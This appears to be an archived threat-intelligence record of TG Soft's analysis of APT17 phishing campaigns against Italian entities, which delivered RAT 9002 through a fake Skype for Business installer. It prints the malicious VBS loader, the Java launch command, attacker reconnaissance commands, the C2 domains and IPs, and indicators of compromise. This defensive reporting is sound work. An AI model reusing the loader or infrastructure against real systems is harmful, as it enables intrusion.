{
	"id": "e9242090-1464-4461-90b3-0badf807db66",
	"created_at": "2026-04-06T00:08:42.169983Z",
	"updated_at": "2026-04-10T03:37:58.840435Z",
	"deleted_at": null,
	"sha1_hash": "c30b35ebd42bc0ea2ddc1637c455161f7aa03683",
	"title": "Italian government agencies and companies in the target of a Chinese APT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 531007,
	"plain_text": "Italian government agencies and companies in the target of a Chinese APT\r\nBy TG Soft S.r.l. - https://www.tgsoft.it\r\nArchived: 2026-04-05 19:25:39 UTC\r\nOn June 24 and July 2, 2024, two targeted attacks on Italian companies and government entities were observed, carried out by a Chinese cyber actor using a variant of the Rat 9002 in diskless mode. Other variants have over time been named Rat 3102. These activities are associated with the APT17 group, also known as \"DeputyDog\".\r\nThe first campaign, on June 24, 2024, used an Office document, while the second campaign contained a link. Both campaigns invited the victim to install a Skype for Business package from a link on an Italian government-like domain in order to deliver a variant of Rat 9002.\r\nRat 9002 and Rat 3102 are notoriously linked to APT17, a Chinese cyber-criminal group known for:\r\nOperation Aurora (attributed to the Chinese government)\r\nOperation Ephemeral Hydra\r\ntargeted attacks on companies and government entities\r\nThe campaigns\r\nThe figure shows the Office document \"GUIDA OPERATIVA PER l’UTENTE.docx\" spread in the June 24, 2024 campaign.\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng\r\nPage 1 of 9\r\nThe Word document was created on June 18, 2024 by a user named \"ple\".\r\nThe July 2 campaign instead directly uses a link to the malicious URL.\r\nBoth campaigns invite the victim to connect to the following page:\r\nhttps://meeting[.]equitaligaiustizia[.]it/angelo.maisto.guest\r\nThe site mimics an official page for Equitalia Giustizia meetings and invites the user to download a customized MSI installation package for the Skype for Business software. 
There is also another legitimate link on the page, https://meeting[.]equitaliagiustizia[.]it/angelo.maisto.guest/MB9GVM5K, which was most likely stolen/intercepted in a possible previous attack.\r\nMalicious URL details:\r\nDOMAIN: meeting[.]equitaligaiustizia[.]it\r\nDomain creation date: 2024-06-13\r\nBy accessing the root of the site, only the \"angelo.maisto.guest\" subfolder is present, as can be seen from the image below.\r\nThe malicious package itself is instead downloaded from the following Microsoft-hosted (Azure Storage) URL:\r\nhttps://skypeformeeting[.]file[.]core[.]windows[.]net/skypeformeeting/SkypeMeeting.msi?sp=r\u0026st=2024-07-04T11:10:14Z\u0026se=2024-08-04T11:10:00Z\u0026spr=https\u0026sv=2022-11-02\u0026sig=8djI9lFWxKmw5MBBk67DvQIMlyE%2F6jME24rrv0xlZs8%3D\u0026sr=f\r\nThe custom MSI package that is downloaded has the following characteristics:\r\nName: SkypeMeeting.msi\r\nSize: 39386624 bytes\r\nSHA-256: 28808164363d221ceb9cc48f7d9dbff8ba3fc5c562f5bea9fa3176df5dd7a41e\r\nInfection chain\r\nIn the downloaded MSI package, the files of interest are the following:\r\nSkypeMeetingsApp.msi (original MSI package for installing Skype for Business)\r\nvcruntime.jar\r\nvcruntime.vbs\r\nvcruntime.bin\r\nBelow is a graph of the infection chain of the campaigns observed.\r\nThe execution of SkypeMeeting.msi therefore involves the installation of the original Skype for Business package and the execution of the Java application \"vcruntime.jar\" via the VBS script \"vcruntime.vbs\", shown below:\r\nSet windowobj = createobject(\"wscript.shell\")\r\nSet Args = WScript.Arguments\r\nstrCommand1 = \"java.exe -jar \"\"\" \u0026 Args(0) \u0026 \"\"\" \"\"\" \u0026 Args(1) \u0026 \"\"\" \"\"\" \u0026 Args(2) \u0026 \"\"\"\"\r\nwindowobj.Run strCommand1,0,False\r\nstrCommand2 = \"msiexec /i  \"\"\" \u0026 Args(3) \u0026 \"\"\"\"\r\nwindowobj.Run 
strCommand2,1,False\r\nThe Java application is then executed with the following command line:\r\njava.exe -jar \"C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\jre-1.8\\bin\\vcruntime.jar\" \"dwrsvsa\" \"C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\jre-1.8\\bin\\vcruntime.bin\"\r\nThe \"vcruntime.bin\" file, an excerpt of which is shown below, contains a shellcode encrypted with RC4:\r\n488f162e-1aaa-060c-4ec4-c6f23c113526\r\n4b2cbd6d-7056-b972-b13b-4c593c3b4ccc\r\n11af7b56-c890-d2ac-3606-d8bcf19fc7a0\r\n35381e2a-bfdd-0df3-ff41-9484f1a74fcc\r\n112c1a02-bfd5-09d3-ff45-039758ef6aec\r\n407e7f28-9ac5-841a-1b25-444b919f5e47\r\n[...]\r\n7d28f699-fb0b-d48a-b535-74419d696584\r\n5a5be410-ded9-1e20-8ca6-c1e49ca94ecc\r\n1178682c-613f-7e65-2100-000000000000\r\nThe Java application decrypts and executes the shellcode. Below we see the first step, which involves deciphering through a simple XOR loop:\r\nAfter decryption, the shellcode decompresses and executes the RAT 9002, as we see in the figure:\r\nThe RAT 9002\r\nThe RAT 9002 performs proxy functions to monitor network traffic; see below some excerpts from the malware dump:\r\nIn this first excerpt we see the command and control server.\r\nIn this second excerpt we see the string \"Dog create a loop thread\", characteristic of the RAT 9002.\r\nIn this third excerpt we see the name of the RAT project.\r\nThe variant of RAT 9002 analyzed contains the value \"20240124\" as a date indicator, as seen in the figure below:\r\nThis value indicates that the malware, although old, continues to be actively developed in 2024.\r\nThe RAT 9002 Trojan is a modular malware that, based on the cyber actor's needs, downloads additional diskless plugins that allow various 
features to be added to the malware. During the analysis of the sample in question, the criminal sent the following additional modules:\r\nScreenSpyS.dll -\u003e screen capture [creation date: 2018-07-19 06:27:00]\r\nRemoteShellS.dll -\u003e execution of programs [creation date: 2022-01-23 04:48:12]\r\nUnInstallS.dll -\u003e uninstallation [creation date: 2012-01-11 10:20:09]\r\nFileManagerS.dll -\u003e browse files [creation date: 2022-01-21 10:35:49]\r\nProcessS.dll -\u003e process management [creation date: 2022-01-22 01:37:08]\r\nUsing the RemoteShellS module, the cybercriminal executed the following commands to discover the network:\r\nsysteminfo.exe\r\nipconfig /all\r\nnet user\r\nnetstat -ano -p tcp\r\nnet use\r\nnet view \\\\\u003credacted_ip\u003e\r\nping \u003credacted_ip\u003e -n 1\r\nThe analyzed sample communicates with its command and control server, hosted on a domain that imitates a Microsoft domain. Below are the details of the C\u0026C server:\r\nDOMAIN: themicrosoftnow[.]com\r\nIP: 137.74.76[.]92, 23.218.225[.]10\r\nPORTS: 80, 443\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.\r\nDomain creation date: 2023-11-27\r\nCommunication with the command and control server is encrypted and then encoded in Base64.\r\nRelated\r\nThrough threat intelligence activities it was possible to correlate an executable file, uploaded to VirusTotal from Italy on 5 July 2024, which appears to be the executable file version of RAT 9002.\r\nName: a.exe\r\nSize: 35328 bytes\r\nCreation date: 2024-07-04 17:02:45\r\nSHA-256: de19e0163af15585c305f845b90262aee3c2bdf037f9fc733d3f1b379d00edd0\r\nThis sample also contains the value \"20240124\" as a date indicator. 
This sample may have been used to persist on an affected machine.\r\nConclusions\r\nThe two campaigns appear to be aimed at a government and/or corporate target.\r\nThe RAT 9002 used is associated with the Chinese cyber-criminal group APT17, called DeputyDog, which appears to have been active since at least 2008. The malware appears to be constantly updated, with diskless variants as well. It is composed of various modules that are activated as needed by the cyber actor so as to reduce the possibility of interception.\r\nThe attack as a whole is particularly sophisticated and designed down to the smallest detail: the domains used are very similar to official domains, and even the creation of the malicious MSI package was carried out with care, as it involves the installation of the legitimate Skype for Business software and, in parallel, the diskless version of the RAT 9002.\r\nThe initial MSI file is downloaded from a Microsoft distribution site to reduce the possibility of interception.\r\nThe use of legitimate links from government entities on the malicious page suggests that the cyber actor had access to confidential information of some user belonging to previously affected Italian companies or entities.\r\nIOC:\r\nthemicrosoftnow[.]com\r\nmeeting[.]equitaligaiustizia[.]it\r\n137[.]74[.]76[.]92\r\n23[.]218[.]225[.]10\r\n28808164363d221ceb9cc48f7d9dbff8ba3fc5c562f5bea9fa3176df5dd7a41e\r\ne024fe959022d2720c1c3303f811082651aef7ed85e49c3a3113fd74f229513c\r\nd6b348976b3c3ed880dc41bb693dc586f8d141fbc9400f5325481d0027172436\r\nc0f93f95f004d0afd4609d9521ea79a7380b8a37a8844990e85ad4eb3d72b50c\r\ncaeca1933efcd9ff28ac81663a304ee17bbcb8091d3f9450a62c291fec973af5\r\nde19e0163af15585c305f845b90262aee3c2bdf037f9fc733d3f1b379d00edd0\r\nAuthors: Ing. 
Gianfranco Tonello, Michele Zuin\r\nAny information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.\r\nIt will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”\r\nSource: https://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.tgsoft.it/news/news_archivio.asp?id=1557\u0026lang=eng"
	],
	"report_names": [
		"news_archivio.asp?id=1557\u0026lang=eng"
	],
	"threat_actors": [
		{
			"id": "2150d1ac-edf0-46d4-a78a-a8899e45b2b5",
			"created_at": "2022-10-25T15:50:23.269339Z",
			"updated_at": "2026-04-10T02:00:05.402835Z",
			"deleted_at": null,
			"main_name": "APT17",
			"aliases": [
				"APT17",
				"Deputy Dog"
			],
			"source_name": "MITRE:APT17",
			"tools": [
				"BLACKCOFFEE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a7aefdda-98f1-4790-a32d-14cc99de2d60",
			"created_at": "2023-01-06T13:46:38.281844Z",
			"updated_at": "2026-04-10T02:00:02.909711Z",
			"deleted_at": null,
			"main_name": "APT17",
			"aliases": [
				"BRONZE KEYSTONE",
				"G0025",
				"Group 72",
				"G0001",
				"HELIUM",
				"Heart Typhoon",
				"Group 8",
				"AURORA PANDA",
				"Hidden Lynx",
				"Tailgater Team"
			],
			"source_name": "MISPGALAXY:APT17",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def",
			"created_at": "2025-08-07T02:03:24.626625Z",
			"updated_at": "2026-04-10T02:00:03.605175Z",
			"deleted_at": null,
			"main_name": "BRONZE KEYSTONE",
			"aliases": [
				"APT17 ",
				"Aurora Panda ",
				"DeputyDog ",
				"Group 72 ",
				"Hidden Lynx ",
				"TG-8153 ",
				"Tailgater Team"
			],
			"source_name": "Secureworks:BRONZE KEYSTONE",
			"tools": [
				"9002",
				"BlackCoffee",
				"DeputyDog",
				"Derusbi",
				"Gh0stHTTPSDropper",
				"HiKit",
				"InternalCMD",
				"PlugX",
				"PoisonIvy",
				"ZxShell"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "86fd71d3-06dc-4b73-b038-cedea7b83bac",
			"created_at": "2022-10-25T16:07:23.330793Z",
			"updated_at": "2026-04-10T02:00:04.545236Z",
			"deleted_at": null,
			"main_name": "APT 17",
			"aliases": [
				"APT 17",
				"ATK 2",
				"Beijing Group",
				"Bronze Keystone",
				"Deputy Dog",
				"Elderwood",
				"Elderwood Gang",
				"G0025",
				"G0066",
				"Operation Aurora",
				"Operation DeputyDog",
				"Operation Ephemeral Hydra",
				"Operation RAT Cook",
				"SIG22",
				"Sneaky Panda",
				"TEMP.Avengers",
				"TG-8153",
				"Tailgater Team"
			],
			"source_name": "ETDA:APT 17",
			"tools": [
				"9002 RAT",
				"AGENT.ABQMR",
				"AGENT.AQUP.DROPPER",
				"AGENT.BMZA",
				"AGENT.GUNZ",
				"Agent.dhwf",
				"AngryRebel",
				"BlackCoffee",
				"Briba",
				"Chymine",
				"Comfoo",
				"Comfoo RAT",
				"Darkmoon",
				"DeputyDog",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Fexel",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Gresim",
				"HOMEUNIX",
				"HiKit",
				"HidraQ",
				"Homux",
				"Hydraq",
				"Jumpall",
				"Kaba",
				"Korplug",
				"Linfo",
				"MCRAT.A",
				"McRAT",
				"MdmBot",
				"Mdmbot.E",
				"Moudour",
				"Mydoor",
				"Naid",
				"Nerex",
				"PCRat",
				"PNGRAT",
				"Pasam",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trojan.Naid",
				"Vasport",
				"Wiarp",
				"Xamtrav",
				"Zox",
				"ZoxPNG",
				"ZoxRPC",
				"gresim",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434122,
	"ts_updated_at": 1775792278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c30b35ebd42bc0ea2ddc1637c455161f7aa03683.pdf",
		"text": "https://archive.orkl.eu/c30b35ebd42bc0ea2ddc1637c455161f7aa03683.txt",
		"img": "https://archive.orkl.eu/c30b35ebd42bc0ea2ddc1637c455161f7aa03683.jpg"
	}
}